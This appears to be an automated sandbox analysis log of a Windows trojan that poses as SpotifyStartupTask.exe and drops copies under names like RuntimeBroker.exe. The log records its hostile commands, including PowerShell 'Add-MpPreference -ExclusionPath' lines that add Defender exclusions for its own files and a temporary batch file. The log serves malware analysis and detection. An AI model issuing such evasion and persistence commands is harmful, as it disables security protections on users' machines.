                            Source: powershell.exe, 00000004.00000002.2672003595.000001DD10075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3162496814.0000016710076000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3227843973.0000024D3A465000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3015277632.0000023D10076000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3035136841.000001F25AF76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3222131396.000001B8923C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                            Source: powershell.exe, 0000000D.00000002.1823237770.000001B882577000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                            Source: powershell.exe, 00000004.00000002.1808534246.000001DD00228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1815208929.0000016700228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1834937845.0000024D2A618000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1815252219.0000023D00228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1817388172.000001F24B128000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1823237770.000001B882577000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                            Source: EQdhBjQw4G.exe, 00000000.00000002.1680880366.0000000003B7D000.00000004.00000800.00020000.00000000.sdmp, EQdhBjQw4G.exe, 00000000.00000002.1680880366.000000000355F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1808534246.000001DD00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1815208929.0000016700001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1834937845.0000024D2A3F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1815252219.0000023D00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1817388172.000001F24AF01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1823237770.000001B882351000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                            Source: powershell.exe, 00000004.00000002.1808534246.000001DD00228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1815208929.0000016700228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1834937845.0000024D2A618000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1815252219.0000023D00228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1817388172.000001F24B128000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1823237770.000001B882577000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                            Source: powershell.exe, 0000000D.00000002.1823237770.000001B882577000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                            Source: powershell.exe, 00000004.00000002.1808534246.000001DD00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1815208929.0000016700001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1834937845.0000024D2A3F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1815252219.0000023D00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1817388172.000001F24AF01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1823237770.000001B882351000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                            Source: powershell.exe, 0000000D.00000002.3222131396.000001B8923C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                            Source: powershell.exe, 0000000D.00000002.3222131396.000001B8923C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                            Source: powershell.exe, 0000000D.00000002.3222131396.000001B8923C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                            Source: svchost.exe, 00000018.00000003.1841092822.000001CE0CEC2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.24.drString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
                            Source: svchost.exe, 00000018.00000003.1841092822.000001CE0CF1A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.1841092822.000001CE0CE0E000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.24.drString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
                            Source: svchost.exe, 00000018.00000003.1841092822.000001CE0CEC2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.24.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
                            Source: svchost.exe, 00000018.00000003.1841092822.000001CE0CEA3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.1841092822.000001CE0CEC2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.24.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                            Source: svchost.exe, 00000018.00000003.1841092822.000001CE0CEC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
                            Source: powershell.exe, 0000000D.00000002.1823237770.000001B882577000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                            Source: powershell.exe, 00000004.00000002.2672003595.000001DD10075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3162496814.0000016710076000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3227843973.0000024D3A465000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3015277632.0000023D10076000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3035136841.000001F25AF76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3222131396.000001B8923C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                            Source: svchost.exe, 00000018.00000003.1841092822.000001CE0CEC2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.24.drString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
                            Source: svchost.exe, 00000018.00000003.1841092822.000001CE0CE72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeWindow created: window name: CLIPBRDWNDCLASS
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeFile created: C:\Windows\SysWOW64\en-GB\Licenses\_Default\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeFile created: C:\Windows\SysWOW64\en-GB\Licenses\_Default\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe\:Zone.Identifier:$DATAJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeFile created: C:\Windows\SysWOW64\en-GB\Licenses\_Default\a4716c5db9108bJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\CSCF98670F718C4420FABE8D0275D85BFD.TMPJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                            Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile deleted: C:\Windows\System32\CSCF98670F718C4420FABE8D0275D85BFD.TMPJump to behavior
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeCode function: 36_2_00007FFD9B8B09AE36_2_00007FFD9B8B09AE
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeCode function: 36_2_00007FFD9B8B075636_2_00007FFD9B8B0756
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeCode function: 36_2_00007FFD9B8A0D7836_2_00007FFD9B8A0D78
                            Source: Joe Sandbox View | Dropped File: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe 8B0B6F7BA3C1C98FDC17CEB74E37057793E104DC92AA4D4319D71411B3E56366
                            Source: Joe Sandbox View | Dropped File: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe 8B0B6F7BA3C1C98FDC17CEB74E37057793E104DC92AA4D4319D71411B3E56366
                            Source: Joe Sandbox View | Dropped File: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe 8B0B6F7BA3C1C98FDC17CEB74E37057793E104DC92AA4D4319D71411B3E56366
                            Source: EQdhBjQw4G.exe, 00000000.00000000.1639490533.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs EQdhBjQw4G.exe
                            Source: EQdhBjQw4G.exe, 00000000.00000002.1742149655.000000001C680000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCmd.Exe.MUIj% vs EQdhBjQw4G.exe
                            Source: EQdhBjQw4G.exe, 00000000.00000002.1742149655.000000001C680000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCmd.Exej% vs EQdhBjQw4G.exe
                            Source: EQdhBjQw4G.exe, 0000001C.00000002.2086973280.00000000026FD000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs EQdhBjQw4G.exe
                            Source: EQdhBjQw4G.exe, 0000001C.00000002.2086973280.00000000026B0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs EQdhBjQw4G.exe
                            Source: EQdhBjQw4G.exe, 0000001F.00000002.2391405992.0000000002B32000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs EQdhBjQw4G.exe
                            Source: EQdhBjQw4G.exe, 0000001F.00000002.2391405992.0000000002BE4000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs EQdhBjQw4G.exe
                            Source: EQdhBjQw4G.exe, 0000001F.00000002.2391405992.0000000002B20000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs EQdhBjQw4G.exe
                            Source: EQdhBjQw4G.exe, 0000001F.00000002.2391405992.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs EQdhBjQw4G.exe
                            Source: EQdhBjQw4G.exe, 00000022.00000002.2666291538.0000000002EFD000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs EQdhBjQw4G.exe
                            Source: EQdhBjQw4G.exe, 00000022.00000002.2666291538.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs EQdhBjQw4G.exe
                            Source: EQdhBjQw4G.exe, 00000022.00000002.2666291538.0000000002F74000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs EQdhBjQw4G.exe
                            Source: EQdhBjQw4G.exe, 00000022.00000002.2666291538.0000000002EC2000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs EQdhBjQw4G.exe
                            Source: EQdhBjQw4G.exe | Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs EQdhBjQw4G.exe
                            Source: EQdhBjQw4G.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                            Source: EQdhBjQw4G.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: RuntimeBroker.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe0.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe1.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: EQdhBjQw4G.exe, hpJE61kMAL8Awig2KFg.cs | Cryptographic APIs: 'CreateDecryptor'
                            Source: classification engine | Classification label: mal100.spre.troj.expl.evad.winEXE@49/56@1/2
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exe | File created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\RuntimeBroker.exe
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exe | File created: C:\Users\user\Desktop\vTqzCdqK.log
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-fMqIIZ3msKTluYQzOgJz
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exe | Mutant created: NULL
                            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5012:120:WilError_03
                            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7544:120:WilError_03
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exe | File created: C:\Users\user\AppData\Local\Temp\5czz1opi
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\nQeR8AonhE.bat"
                            Source: EQdhBjQw4G.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exe | File read: C:\Users\desktop.ini
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                            Source: EQdhBjQw4G.exe | ReversingLabs: Detection: 65%
                            Source: EQdhBjQw4G.exe | Virustotal: Detection: 52%
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exe | File read: C:\Users\user\Desktop\EQdhBjQw4G.exe
                            Source: unknown | Process created: C:\Users\user\Desktop\EQdhBjQw4G.exe "C:\Users\user\Desktop\EQdhBjQw4G.exe"
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5czz1opi\5czz1opi.cmdline"
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES790E.tmp" "c:\Windows\System32\CSCF98670F718C4420FABE8D0275D85BFD.TMP"
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe'
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\SysWOW64\en-GB\Licenses\_Default\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\RuntimeBroker.exe'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\Start Menu\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\EQdhBjQw4G.exe'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\nQeR8AonhE.bat"
                            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                            Source: unknown | Process created: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe "C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe"
                            Source: C:\Windows\System32\cmd.exe | Process created: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe "C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\RuntimeBroker.exe"
                            Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                            Source: unknown | Process created: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe "C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\RuntimeBroker.exe"
                            Source: unknown | Process created: C:\Users\user\Desktop\EQdhBjQw4G.exe "C:\Users\user\Desktop\EQdhBjQw4G.exe"
                            Source: unknown | Process created: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe "C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe"
                            Source: unknown | Process created: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe "C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\RuntimeBroker.exe"
                            Source: unknown | Process created: C:\Users\user\Desktop\EQdhBjQw4G.exe "C:\Users\user\Desktop\EQdhBjQw4G.exe"
                            Source: unknown | Process created: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe "C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe"
                            Source: unknown | Process created: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe "C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\RuntimeBroker.exe"
                            Source: unknown | Process created: C:\Users\user\Desktop\EQdhBjQw4G.exe "C:\Users\user\Desktop\EQdhBjQw4G.exe"
                            Source: unknown | Process created: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe "C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe"
                            Source: unknown | Process created: C:\Windows\SysWOW64\en-GB\Licenses\_Default\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe "C:\Windows\SysWOW64\en-GB\Licenses\_Default\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe"
                            Source: unknown | Process created: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe "C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\RuntimeBroker.exe"
                            Source: unknown | Process created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe "C:\Users\Default User\Start Menu\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe"
                            Source: unknown | Process created: C:\Users\user\Desktop\EQdhBjQw4G.exe "C:\Users\user\Desktop\EQdhBjQw4G.exe"
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES790E.tmp" "c:\Windows\System32\CSCF98670F718C4420FABE8D0275D85BFD.TMP"
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
